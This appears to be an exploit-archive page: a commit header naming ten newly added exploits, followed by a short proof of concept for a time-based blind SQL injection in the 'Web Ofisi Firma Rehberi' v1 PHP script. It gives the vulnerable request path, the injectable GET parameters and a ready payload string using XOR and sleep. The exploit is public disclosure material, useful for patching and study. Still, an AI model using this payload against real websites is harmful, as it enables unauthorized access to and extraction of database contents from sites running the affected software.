7ec7ea72de
10 changes to exploits/shellcodes MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter) fuelCMS 1.4.1 - Remote Code Execution Web Ofisi E-Ticaret 3 - 'a' SQL Injection Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection Web Ofisi Emlak 2 - 'ara' SQL Injection Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection Web Ofisi Firma Rehberi 1 - 'il' SQL Injection Web Ofisi Rent a Car 3 - 'klima' SQL Injection Web Ofisi Firma 13 - 'oz' SQL Injection REDCap < 9.1.2 - Cross-Site Scripting
15 lines
No EOL
502 B
Text
15 lines
No EOL
502 B
Text
# Exploit Title: Web Ofisi Firma Rehberi 1 - 'il' SQL Injection
|
|
# Date: 2019-07-19
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor: https://www.web-ofisi.com/detay/firma-rehberi-scripti-v1.html
|
|
# Demo Site: http://demobul.net/firma-rehberi-v1/
|
|
# Version: v1
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
|
|
----- PoC: SQLi -----
|
|
|
|
Request:
|
|
http://localhost/[PATH]/firmalar.html?il=0&kat=&kelime=&siralama=yeni
|
|
Vulnerable Parameters: il,kelime,kat (GET)
|
|
Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z |